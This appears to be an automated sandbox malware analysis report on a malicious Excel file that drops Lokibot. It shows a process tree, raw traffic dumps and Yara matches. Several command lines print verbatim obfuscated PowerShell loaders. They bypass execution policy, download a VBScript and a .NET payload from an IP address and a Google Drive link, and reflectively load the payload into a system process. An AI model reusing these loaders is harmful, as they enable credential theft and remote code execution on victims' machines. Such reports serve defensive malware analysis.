2024-10-25 17:51:32 UTC	1378	IN	Data Raw: 01 32 29 b9 26 8f b6 16 02 34 ee 25 08 c5 87 2a bb c8 03 e7 44 1f d7 0f f7 49 0c 77 be 02 4f ff 00 6f 4f fd 59 0d a4 95 63 16 d0 90 be d3 23 7e 81 b0 1a 86 59 f5 09 23 43 24 e1 4d 1d cd 2b 11 d0 58 15 c0 b3 fe 20 46 44 5a 83 3b 14 59 a6 89 55 50 bb b4 cc 6c d8 56 ef d3 93 f9 7b 62 09 a7 96 48 77 a3 42 01 3c dc aa a4 8f 88 2c 32 1f 49 22 a9 25 a1 20 2e ea 12 27 4f a3 73 80 ea 99 bc a5 f3 1a 44 2e 18 28 69 18 f2 0a f5 00 93 5c 9e dd 33 33 5c 85 67 60 58 b1 e2 d9 9a cf f7 af 9e 73 bb 36 9c 21 24 aa 12 47 3c 73 5f 9e 2c 78 04 0b a3 c9 27 02 83 83 9a be 16 e9 1c 52 33 90 29 81 e7 e5 99 4a 2c e6 e7 81 e9 61 d4 45 28 96 23 21 0c 36 fb 0c 0d 48 75 9a 52 a1 69 48 6f c3 75 57 99 1a f9 8f dd 9d 23 da c0 b7 2c 3a e6 e4 de 1f 02 10 91 32 83 b4 b0 b4 04 03 5d c5 67 99 Data Ascii: 2)&4%*DIwOoOYc#~Y#C$M+X FDZ;YUPlV{bHwB<,2I"% .'OsD.(i\33\g`Xs6!$G<s_,x'R3)J,aE(#!6HuRiHouW#,:2]g
2024-10-25 17:51:32 UTC	1378	IN	Data Raw: a6 09 d8 19 02 81 47 df 03 d0 7d 9e 56 6d 0b d3 6d 01 ec 1f a5 62 bf 68 55 9b 57 a7 0d d7 6f 1f 1f 56 5b c2 35 03 45 0c 9e 71 db 16 e5 36 db af 9b 1c 7e 78 2f 13 d4 47 ac d4 c6 da 76 de 11 4a 9d bb ab df db 03 d0 1d eb a5 2a 59 98 85 6f c5 db e1 9e 7f ec d0 65 9a 72 39 f4 0f e7 9a e7 59 12 e9 49 97 74 67 98 d4 10 c6 cd 7b 7d 33 27 c1 b7 e9 27 73 22 32 ab a8 16 55 b9 eb d0 56 03 3e 3f a7 f3 60 13 85 f5 44 68 ff 00 ba 7f eb 97 d0 f8 ac 6b e1 db a4 3c c4 84 f4 27 75 76 c7 27 96 07 86 45 91 c4 6a ca 08 69 01 0a 77 03 c0 be a7 8c f1 c2 45 86 52 a5 4b c5 7c 7a a8 10 3e 38 1e 8f 45 71 81 23 bb 7d e2 57 0c ea 1e ec 37 22 97 bf 40 0d f6 27 0b aa f1 6d 1f 87 c6 22 0e 24 91 46 d1 1c 7f c2 45 8e 4f 6e 95 99 7b 3c 5f c5 90 05 8c 41 a6 6b 62 45 20 6b b2 49 fe 23 77 db Data Ascii: G}VmmbhUWoV[5Eq6~x/GvJ*Yoer9YItg{}3''s"2UV>?`Dhk<'uv'EjiwERK\|z>8Eq#}W7"@'m"$FEOn{<_AkbE kI#w
2024-10-25 17:51:32 UTC	1378	IN	Data Raw: c1 83 32 8f 22 1f 51 5f c4 07 3d c6 6b 7d 84 d4 3e 8b c6 3e d6 46 92 42 d1 a7 83 6a 9c 79 60 fa 76 95 3b 41 20 1e fc e6 27 db 14 0d f6 bd 1c 39 15 a7 d1 15 63 dc 7d de 2a c0 f4 9f b5 e9 e4 66 fb 3d e6 24 b1 ca 9a 3d 92 ab 22 a8 0d b5 18 f0 39 1c b5 73 ed 9f 39 d3 40 41 2e 25 da c3 e1 9f 58 fd b3 cb a6 6f 1d f0 5d 3e a6 49 04 50 a3 89 5d 41 69 0f 0a 68 02 40 ff 00 47 3e 63 19 73 11 0b 11 65 00 0e 08 04 1b e8 6b eb 80 16 49 4a b2 79 a5 95 81 06 85 60 df 46 15 81 f3 38 35 7e 95 be 3e 39 a4 c9 b9 76 15 28 d5 dc 7f 5c 4e 73 e4 05 56 91 c5 9a e2 bf b6 05 f4 30 9f 35 9c 92 39 b5 0d 44 9b f9 65 f5 28 eb 21 60 ea 41 ef b7 a7 eb 93 02 ed 56 70 f2 1f cb fb 64 b9 67 04 17 60 0f ca f0 10 9d dc 00 a6 82 df 04 1e bf 4c 59 1e 35 d4 ac 80 30 2a c1 a8 f7 ae 72 e4 93 a8 60 Data Ascii: 2"Q_=k}>>FBjy`v;A '9c}f=$="9s9@A.%Xo]>IP]Aih@G>csekIJy`F85~>9v(\NsV059De(!`AVpdg`LY50r`
2024-10-25 17:51:32 UTC	1378	IN	Data Raw: 37 8a 68 7c 54 6a f5 6e a1 58 93 d2 ff 00 0e 06 b1 71 e6 86 14 01 e3 35 1a 26 01 02 90 40 51 98 a6 46 ad a5 68 8f 61 8f 47 3b be 94 12 18 38 e2 fb d6 03 ee 8a 40 e5 77 03 57 ed 99 72 41 73 19 59 82 95 36 6c f1 8d 39 91 62 57 03 e2 d7 94 79 b7 46 43 42 ac 08 a6 e7 00 12 a4 72 c2 35 01 d6 ec f4 c5 11 d9 e4 6d cc 09 19 da 9d f3 41 22 44 16 26 2a 55 6b b6 28 35 02 2d 54 7a 5a b7 65 b2 c7 e0 30 0b a9 94 45 a9 44 67 1b 4f 38 ea ea 12 29 46 c2 b5 fc 40 e2 7a bd 3a 4e ea d2 2a 8d b5 cd e5 e0 81 5d 4c c4 86 8f a5 8c 0d b6 d5 a0 d3 f9 88 a1 56 bf 2c cc 96 68 e6 f5 07 52 4f c7 13 f1 2d 54 ef a0 91 74 e8 ab 10 1b 49 ef 79 e5 9a 79 e3 05 0b 1b 53 d7 bd e0 7b 2d 3c a8 58 a1 75 0c 0f 17 df 0b a9 9d 9b 4a 51 59 42 a9 e2 bd fd b3 c5 cb aa d5 ee 0f 23 b2 9a e0 91 57 84 83 Data Ascii: 7h\|TjnXq5&@QFhaG;8@wWrAsY6l9bWyFCBr5mA"D&Uk(5-TzZe0EDgO8)F@z:N]LV,hRO-TtIyyS{-<XuJQYB#W

Target ID:	0
Start time:	13:50:21
Start date:	25/10/2024
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Imagebase:	0x13f540000
File size:	28'253'536 bytes
MD5 hash:	D53B85E21886D2AF9815C377537BCAC3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	13:50:45
Start date:	25/10/2024
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\mshta.exe -Embedding
Imagebase:	0x13ff70000
File size:	13'824 bytes
MD5 hash:	95828D670CFD3B16EE188168E083C3C5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	13:50:59
Start date:	25/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\SysTEM32\winDOWspOWERSheLL\v1.0\pOweRSheLl.ExE" "poWERShELl -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe ; IeX($(iEx('[syStem.TeXt.enCOdIng]'+[ChAr]58+[ChAr]0x3A+'utF8.geTStRiNg([SySTeM.cOnveRt]'+[CHar]0x3a+[ChAR]58+'FROMBASE64sTRINg('+[cHaR]34+'JExBTmYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYmVyZEVmaU5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBidEdsVWpzLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRFNGWUcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVEYWNZeVRZWUNRLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQmtab0UsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFqUXRiYXVIcWJUKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJVYlRicGlLZSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEWlZyQVJNZFdhaCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRMQU5mOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS80MS9zaW1wbGV0aGluZ3N3aXRoZ3JlYXR0aGlnbnNnaXZlbm1lYmVzdHRoaW5ncy50SUYiLCIkRU52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIiwwLDApO1N0YVJ0LVNMZUVQKDMpO3N0YXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIg=='+[Char]34+'))')))"
Imagebase:	0x13f130000
File size:	443'392 bytes
MD5 hash:	A575A7610E5F003CC36DF39E07C4BA7D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	13:51:02
Start date:	25/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe
Imagebase:	0x13f130000
File size:	443'392 bytes
MD5 hash:	A575A7610E5F003CC36DF39E07C4BA7D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	13:51:04
Start date:	25/10/2024
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\mshta.exe -Embedding
Imagebase:	0x13f6c0000
File size:	13'824 bytes
MD5 hash:	95828D670CFD3B16EE188168E083C3C5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	13:51:05
Start date:	25/10/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lwndurzh\lwndurzh.cmdline"
Imagebase:	0x13f3a0000
File size:	2'758'280 bytes
MD5 hash:	23EE3D381CFE3B9F6229483E2CE2F9E1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	13:51:06
Start date:	25/10/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7AEA.tmp" "c:\Users\user\AppData\Local\Temp\lwndurzh\CSCC4D24F44B33B435588447526C34E647.TMP"
Imagebase:	0x13f6b0000
File size:	52'744 bytes
MD5 hash:	C877CBB966EA5939AA2A17B6A5160950
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	13:51:08
Start date:	25/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\SysTEM32\winDOWspOWERSheLL\v1.0\pOweRSheLl.ExE" "poWERShELl -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe ; IeX($(iEx('[syStem.TeXt.enCOdIng]'+[ChAr]58+[ChAr]0x3A+'utF8.geTStRiNg([SySTeM.cOnveRt]'+[CHar]0x3a+[ChAR]58+'FROMBASE64sTRINg('+[cHaR]34+'JExBTmYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYmVyZEVmaU5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBidEdsVWpzLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRFNGWUcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVEYWNZeVRZWUNRLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQmtab0UsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFqUXRiYXVIcWJUKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJVYlRicGlLZSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEWlZyQVJNZFdhaCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRMQU5mOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS80MS9zaW1wbGV0aGluZ3N3aXRoZ3JlYXR0aGlnbnNnaXZlbm1lYmVzdHRoaW5ncy50SUYiLCIkRU52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIiwwLDApO1N0YVJ0LVNMZUVQKDMpO3N0YXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIg=='+[Char]34+'))')))"
Imagebase:	0x13f130000
File size:	443'392 bytes
MD5 hash:	A575A7610E5F003CC36DF39E07C4BA7D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: powershell.exePID: 1472, Parent PID: 1488

General

Target ID:	14
Start time:	13:51:09
Start date:	25/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe
Imagebase:	0x13f130000
File size:	443'392 bytes
MD5 hash:	A575A7610E5F003CC36DF39E07C4BA7D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: csc.exePID: 1944, Parent PID: 1488

General

Target ID:	16
Start time:	13:51:12
Start date:	25/10/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3w1sxmqs\3w1sxmqs.cmdline"
Imagebase:	0x13fbf0000
File size:	2'758'280 bytes
MD5 hash:	23EE3D381CFE3B9F6229483E2CE2F9E1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	13:51:12
Start date:	25/10/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9251.tmp" "c:\Users\user\AppData\Local\Temp\3w1sxmqs\CSC4FC5C9177C1B495AB64B9617174E2B9E.TMP"
Imagebase:	0x13fcf0000
File size:	52'744 bytes
MD5 hash:	C877CBB966EA5939AA2A17B6A5160950
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	13:51:16
Start date:	25/10/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplethingswithgreatthignsgivenmebest.vbS"
Imagebase:	0xfff80000
File size:	168'960 bytes
MD5 hash:	045451FA238A75305CC26AC982472367
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	13:51:22
Start date:	25/10/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplethingswithgreatthignsgivenmebest.vbS"
Imagebase:	0xffc50000
File size:	168'960 bytes
MD5 hash:	045451FA238A75305CC26AC982472367
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: powershell.exePID: 1668, Parent PID: 2640

General

Target ID:	21
Start time:	13:51:23
Start date:	25/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJHBTaG9tZVsyMV0rJFBzaE9tZVszMF0rJ3gnKSAoICgoJ3N3UmltYWdlVXJsID0gNWw3JysnaHR0cHM6Ly8nKydkcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgNWw3O3N3UndlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbGllbnQ7c3dSaW1hZ2VCeXRlcyA9IHN3UndlYkNsaWVudC5Eb3dubG9hZERhdGEoc3dSaW1hZ2VVcmwpO3N3JysnUmltYWdlVGV4dCA9IFtTeXN0ZW0nKycuVGV4dC5FbmNvZGluZ10nKyc6OlVURjguR2V0U3RyaW5nKHN3UmltYWdlQnl0ZXMpO3N3UnN0YXJ0RmxhZyA9IDVsNzw8QkEnKydTRTY0X1NUQVJUPicrJz41bDc7c3dSZW5kRmxhZyA9IDVsNzw8QkFTRTY0X0VORD4+NWw3O3N3UnMnKyd0YXJ0SW5kZXggPSBzd1JpbWFnZVRleHQuSW5kZXhPZicrJyhzd1JzdGFydEZsYWcpO3N3UmVuZEluZGV4ID0gc3dSaW1hZ2VUJysnZXh0LkluZGV4T2Yoc3dSZW5kRmxhZyk7c3dSc3RhcnRJJysnbmRleCAtZ2UgMCAtYW5kIHMnKyd3UmVuZEluZGV4IC1ndCBzd1JzdGEnKydydEluZGV4O3N3UnN0YXJ0SW5kZXggKz0gc3dSc3RhcnRGbGFnLkxlbmd0aDtzd1JiYXNlNjRMZW5ndGggPSBzd1JlbmRJbmRleCAtIHN3UnN0YXJ0SW5kZXg7c3dSYmFzZTY0Q29tbWFuZCA9IHN3UmltYWdlVGV4dC5TdWJzJysndHJpbmcoc3dSc3RhcnRJbmRleCwgc3dSYmFzZTY0TGVuZ3RoKTtzd1JiYXNlNjRSZXZlcnNlZCA9IC1qbycrJ2luIChzd1JiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCcrJykgRncxJysnICcrJ0ZvckVhY2gtT2JqZWN0IHsgc3dSXyB9KVstMS4uLShzd1JiYXNlNjRDb21tYW5kLkxlbmd0aCldO3N3UmNvbW1hbmRCeXRlcyA9JysnIFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoc3dSYmFzZTY0UmV2ZXJzZWQpO3N3UmxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChzd1Jjb21tYW5kQnl0ZXMpO3N3UnZhaU1ldGhvZCA9IFtkJysnbmxpYicrJy5JTy5Ib21lXS5HZXRNZXRob2QoNWw3VkFJNWw3KTtzd1J2YWlNZXRob2QuSW52b2tlKHN3Um51bGwsIEAoNWw3dHh0LlRUUkxQTVMvMTQvMTQxLjY3MS4zLjI5MS8vOnB0dGg1bDcsIDVsN2Rlc2F0aXZhZG81bDcsIDVsN2Rlc2F0aXZhZG81bDcsIDVsN2Rlc2F0aXZhZG8nKyc1bDcsICcrJzVsN2FzcG5ldF9yZWdicm93c2VyczVsNywgNWw3ZCcrJ2VzYXRpdmFkbzVsNywgNWw3ZGVzYXRpdmFkbzVsNyw1bDdkZXNhdGl2YWRvNWw3LDVsN2Rlc2F0aXZhZG81bDcsNWw3ZGVzYXRpdmFkbzVsNyw1bDdkZXNhdGl2YWRvNWw3LDVsN2Rlc2F0aXZhZG81bDcsNWw3MTVsNyw1bDdkZXNhdGl2YWRvNWw3KSk7JykgLXJlUExhY0UnNWw3JyxbY0hhcl0zOSAtcmVQTGFjRSAnc3dSJyxbY0hhcl0zNiAgLUNSZXBMQWNlICAnRncxJyxbY0hhcl0xMjQpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Imagebase:	0x13f130000
File size:	443'392 bytes
MD5 hash:	A575A7610E5F003CC36DF39E07C4BA7D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	23
Start time:	13:51:23
Start date:	25/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $pShome[21]+$PshOme[30]+'x') ( (('swRimageUrl = 5l7'+'https://'+'drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur 5l7;swRwebClient = New-Object System.Net.W'+'ebClient;swRimageBytes = swRwebClient.DownloadData(swRimageUrl);sw'+'RimageText = [System'+'.Text.Encoding]'+'::UTF8.GetString(swRimageBytes);swRstartFlag = 5l7<<BA'+'SE64_START>'+'>5l7;swRendFlag = 5l7<<BASE64_END>>5l7;swRs'+'tartIndex = swRimageText.IndexOf'+'(swRstartFlag);swRendIndex = swRimageT'+'ext.IndexOf(swRendFlag);swRstartI'+'ndex -ge 0 -and s'+'wRendIndex -gt swRsta'+'rtIndex;swRstartIndex += swRstartFlag.Length;swRbase64Length = swRendIndex - swRstartIndex;swRbase64Command = swRimageText.Subs'+'tring(swRstartIndex, swRbase64Length);swRbase64Reversed = -jo'+'in (swRbase64Command.ToCharArray('+') Fw1'+' '+'ForEach-Object { swR_ })[-1..-(swRbase64Command.Length)];swRcommandBytes ='+' [System.Convert]::FromBase64String(swRbase64Reversed);swRloadedAssembly = [System.Reflection.Assembly]::Load(swRcommandBytes);swRvaiMethod = [d'+'nlib'+'.IO.Home].GetMethod(5l7VAI5l7);swRvaiMethod.Invoke(swRnull, @(5l7txt.TTRLPMS/14/141.671.3.291//:ptth5l7, 5l7desativado5l7, 5l7desativado5l7, 5l7desativado'+'5l7, '+'5l7aspnet_regbrowsers5l7, 5l7d'+'esativado5l7, 5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l715l7,5l7desativado5l7));') -rePLacE'5l7',[cHar]39 -rePLacE 'swR',[cHar]36 -CRepLAce 'Fw1',[cHar]124) )"
Imagebase:	0x13f130000
File size:	443'392 bytes
MD5 hash:	A575A7610E5F003CC36DF39E07C4BA7D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	13:51:47
Start date:	25/10/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
Imagebase:	0x1270000
File size:	45'160 bytes
MD5 hash:	04AA198D72229AEED129DC20201BF030
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Loki_1, Description: Loki Payload, Source: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Has exited:	false

Show Windows behavior

VBA Code

Call Graph

Graph

Entrypoint
Decryption Function
Executed
Not Executed
Show Help

Module: Sheet1

Declaration

Line	Content
1	Attribute VB_Name = "Sheet1"
2	Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = True

Module: Sheet2

Declaration

Line	Content
1	Attribute VB_Name = "Sheet2"
2	Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = True

Module: Sheet3

Declaration

Line	Content
1	Attribute VB_Name = "Sheet3"
2	Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = True

Module: ThisWorkbook

Declaration

Line	Content
1	Attribute VB_Name = "ThisWorkbook"
2	Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = True

Reset < >

Analysis Process: mshta.exePID: 3848, Parent PID: 564COMMON

Executed Functions

Function 029D0FB9 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000003.463003055.00000000029D0000.00000010.00000800.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_3_29d0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
Instruction ID: 67e76dc1c73e36f3db2bc0b6d7daf0ec1cc2853d409592385e390610c388bcee
Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
Instruction Fuzzy Hash:

Function 029D0FB1 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000003.463003055.00000000029D0000.00000010.00000800.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_3_29d0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
